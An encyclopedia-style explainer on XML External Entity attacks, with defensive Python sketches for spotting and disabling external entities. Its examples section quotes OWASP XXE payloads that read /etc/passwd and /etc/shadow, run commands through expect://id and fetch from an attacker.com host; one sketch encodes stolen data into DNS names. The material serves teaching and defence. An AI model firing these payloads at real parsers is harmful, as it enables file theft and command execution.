An XML External Entity attack, or simply XXE attack, is a type of attack against an application that parses XML input. The attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. It may lead to the disclosure of confidential data, denial-of-service (DoS) attacks, server-side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts.
Description
The XML 1.0 standard defines the structure of an XML document. The standard defines a concept called an entity, a term that refers to several types of data unit. One of those types is the external general/parameter parsed entity, often shortened to external entity, which can access local or remote content via a declared system identifier. The system identifier is assumed to be a URI that the XML processor can access when processing the entity. The XML processor then replaces occurrences of the named external entity with the content referenced by the system identifier. If the system identifier contains tainted data and the XML processor dereferences it, the XML processor may disclose confidential information not normally accessible to the application. Similar attack vectors apply to the use of external DTDs, external style sheets, external schemas, and so on, which, when included, allow similar external resource inclusion attacks.
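To make the terms concrete, the following is a minimal sketch in Python that lists the external entities a document declares, together with their system identifiers. It relies on the standard library's expat bindings; the function name `list_external_entities` and the sample document are illustrative assumptions. No external-entity handler is installed, so the sketch only inspects declarations and never fetches the referenced content.

```python
from xml.parsers import expat


def list_external_entities(xml_text):
    """Return (entity_name, system_identifier) pairs declared in the DTD."""
    found = []

    def on_entity_decl(name, is_parameter, value, base, system_id, public_id, notation):
        # Internal entities carry an inline value; external ones carry
        # a system identifier instead.
        if value is None and system_id is not None:
            found.append((name, system_id))

    parser = expat.ParserCreate()
    parser.EntityDeclHandler = on_entity_decl
    # No ExternalEntityRefHandler is set, so nothing is dereferenced here.
    parser.Parse(xml_text, True)
    return found


# Illustrative document: one internal entity and one external entity.
SAMPLE = """<!DOCTYPE foo [
  <!ENTITY greeting "hello">
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo>&greeting; &xxe;</foo>"""

print(list_external_entities(SAMPLE))
```

Only `xxe` is reported, because `greeting` is an internal entity whose replacement text is written directly in the declaration.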
Attacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file:// schemes or relative paths in the system identifier. Since the attack occurs relative to the application processing the XML document, an attacker may use this trusted application to pivot to other internal systems, possibly disclosing other internal content via HTTP requests or launching a CSRF attack against any unprotected internal services. In some situations, an XML processor library that is vulnerable to client-side memory corruption issues may be exploited by dereferencing a malicious URI, possibly allowing arbitrary code execution under the application account. Other attacks can access local resources that may never stop returning data, possibly impacting application availability if too many threads or processes are not released.
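The relationship between the form of a system identifier and the access it would trigger can be sketched as a small classifier. This is an illustrative Python helper, not part of any XML library: the function name, the category labels, and the host `internal.example` are assumptions made for the example.

```python
from urllib.parse import urlsplit


def classify_system_identifier(system_id):
    """Map a system identifier to the kind of access it would trigger."""
    scheme = urlsplit(system_id).scheme.lower()
    if scheme == "file":
        return "local file read"
    if scheme in ("http", "https", "ftp"):
        return "outbound network request"
    if scheme == "":
        return "relative path"
    return "other scheme: " + scheme


for candidate in (
    "file:///etc/passwd",
    "http://internal.example/admin",  # hypothetical internal host
    "config/db.xml",
):
    print(candidate, "->", classify_system_identifier(candidate))
```

A processor that dereferences any of these on behalf of an untrusted document performs the access with the application's own privileges and network position, which is what makes the pivot to internal systems possible.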
The application does not need to explicitly return the response to the attacker for it to be vulnerable to information disclosure. An attacker can leverage DNS lookups to exfiltrate data, encoding it in subdomain names that are resolved through a DNS server under their control.
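As an illustration of why a hostname alone can carry data, the sketch below encodes a few bytes into DNS labels under a zone. It assumes base32 as the encoding and uses the hypothetical zone `attacker.example`; real traffic may use other encodings. The limits it enforces (63 characters per label, 253 characters per name) are those of DNS itself.

```python
import base64


def to_dns_name(data, zone):
    """Encode bytes as base32 labels (at most 63 chars each) under `zone`."""
    encoded = base64.b32encode(data).decode("ascii").rstrip("=").lower()
    labels = [encoded[i:i + 63] for i in range(0, len(encoded), 63)]
    name = ".".join(labels + [zone])
    if len(name) > 253:
        raise ValueError("name exceeds the 253-character DNS limit")
    return name


# Hypothetical zone; any resolver looking up this name forwards the
# encoded labels to the zone's authoritative server.
print(to_dns_name(b"root:x:0:0", "attacker.example"))
```

For defenders, this suggests that unusually long or random-looking subdomain labels in outbound DNS logs from an XML-processing host are worth reviewing.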
Risk factors
* The application parses XML documents.
* Tainted data is allowed within the system identifier portion of the entity, within the document type definition (DTD).
* The XML processor is configured to validate and process the DTD.
* The XML processor is configured to resolve external entities within the DTD.
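The last risk factor is a matter of parser configuration. As a minimal sketch, assuming Python's standard `xml.sax` module, the feature `feature_external_ges` controls whether external general entities are dereferenced. The helper names `TextCollector`, `parse_text`, and `demo` are illustrative, and the "secret" is a throwaway temporary file created only for the demonstration.

```python
import io
import pathlib
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


class TextCollector(ContentHandler):
    """Collects all character data reported by the SAX parser."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)


def parse_text(xml_bytes, resolve_external=False):
    """Parse xml_bytes and return its text content."""
    parser = xml.sax.make_parser()
    # False tells the processor not to dereference external general entities.
    parser.setFeature(feature_external_ges, resolve_external)
    collector = TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(collector.chunks)


def demo():
    """Point an external entity at a throwaway file and parse safely."""
    with tempfile.TemporaryDirectory() as tmp:
        secret = pathlib.Path(tmp) / "secret.txt"
        secret.write_text("TOP-SECRET")
        doc = (
            '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "%s">]>'
            "<foo>before &xxe; after</foo>" % secret.as_uri()
        )
        return parse_text(doc.encode("utf-8"))


print(repr(demo()))
```

With the feature disabled, the entity reference is skipped and the file's content never reaches the application. Passing `resolve_external=True` would recreate the risky configuration described in the list above.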
Examples
The examples below are from OWASP's Testing for XML Injection (WSTG-INPV-07).
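Accessing a local resource that may not return
    <?xml version="1.0" encoding="ISO-8859-1"?>
    <!DOCTYPE foo [
      <!ELEMENT foo ANY >
      <!ENTITY xxe SYSTEM "file:///dev/random" >]>
    <foo>&xxe;</foo>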
Remote code execution
When the PHP "expect" module is loaded, remote code execution may be possible with a modified payload.
    <?xml version="1.0" encoding="ISO-8859-1"?>
    <!DOCTYPE foo [
      <!ELEMENT foo ANY >
      <!ENTITY xxe SYSTEM "expect://id" >]>
    <creds>
      <user>&xxe;</user>
      <pass>mypass</pass>
    </creds>
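Disclosing /etc/passwd or other targeted files
    <?xml version="1.0" encoding="ISO-8859-1"?>
    <!DOCTYPE foo [
      <!ELEMENT foo ANY >
      <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
    <foo>&xxe;</foo>

    <?xml version="1.0" encoding="ISO-8859-1"?>
    <!DOCTYPE foo [
      <!ELEMENT foo ANY >
      <!ENTITY xxe SYSTEM "file:///etc/shadow" >]>
    <foo>&xxe;</foo>

    <?xml version="1.0" encoding="ISO-8859-1"?>
    <!DOCTYPE foo [
      <!ELEMENT foo ANY >
      <!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]>
    <foo>&xxe;</foo>

    <?xml version="1.0" encoding="ISO-8859-1"?>
    <!DOCTYPE foo [
      <!ELEMENT foo ANY >
      <!ENTITY xxe SYSTEM "http://www.attacker.com/text.txt" >]>
    <foo>&xxe;</foo>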
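How a given parser reacts to a file-disclosure payload depends on the library and its configuration. As one data point, the sketch below feeds such a payload to Python's standard `xml.etree.ElementTree`, which, according to the Python documentation, does not expand external entities and raises a `ParseError` when one is referenced. The helper name `try_parse` is an illustrative assumption.

```python
import xml.etree.ElementTree as ET

# File-disclosure payload: an external entity pointing at a local file.
PAYLOAD = """<!DOCTYPE foo [
  <!ELEMENT foo ANY>
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo>&xxe;</foo>"""


def try_parse(xml_text):
    """Return the root element's text, or a message if parsing is refused."""
    try:
        return ET.fromstring(xml_text).text
    except ET.ParseError as exc:
        return "rejected: %s" % exc


print(try_parse(PAYLOAD))
print(try_parse("<foo>ok</foo>"))
```

Other parsers, including other Python XML modules and bindings to native libraries, may behave differently, so each parser in use should be checked individually.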
Mitigation
Since the entire XML document is communicated from an untrusted client, it is not usually possible to selectively validate or escape tainted data within the system identifier in the DTD. Instead, the XML processor could be configured to use a local static DTD and disallow any declared DTD included in the XML document.
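Disallowing a document-supplied DTD can be sketched with Python's standard expat bindings by aborting as soon as a DOCTYPE declaration is encountered. This is a minimal sketch under that assumption, not a complete hardening recipe; the names `DTDForbidden` and `parse_without_dtd` are hypothetical.

```python
from xml.parsers import expat


class DTDForbidden(ValueError):
    """Raised when an untrusted document declares a DOCTYPE."""


def parse_without_dtd(xml_text):
    """Parse xml_text and return its element names; refuse any DOCTYPE."""
    names = []

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # Abort before any entity declared in the DTD can be used.
        raise DTDForbidden("DOCTYPE declarations are not accepted")

    parser = expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    parser.StartElementHandler = lambda name, attrs: names.append(name)
    parser.Parse(xml_text, True)
    return names


print(parse_without_dtd("<order><item/></order>"))

try:
    parse_without_dtd(
        '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>'
    )
except DTDForbidden as exc:
    print("refused:", exc)
```

Rejecting the DOCTYPE outright avoids having to reason about individual entity declarations, at the cost of refusing legitimate documents that carry their own DTD.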
See also
* SQL injection
* Blind SQL injection
External links
* OWASP XML External Entity (XXE) Prevention Cheat Sheet
* Timothy Morgan's 2014 paper: XML Schema, DTD, and Entity Attacks - A Compendium of Known Techniques
* Precursor presentation of the above paper, at OWASP AppSec USA 2013
* CWE-827: Improper Control of Document Type Definition (http://cwe.mitre.org/data/definitions/827.html)
* Sascha Herzog's presentation on XML External Entity Attacks, at OWASP AppSec Germany 2010
* PostgreSQL XXE vulnerability
* XML Denial of Service Attacks and Defenses (in .NET)
* Early (2002) BugTraq article on XXE (archived 2019-09-02 at https://web.archive.org/web/20190902095546/https://www.securityfocus.com/archive/1/297714/2002-10-27/2002-11-02/0)
* Extensible Markup Language (XML) 1.0 (Fifth Edition)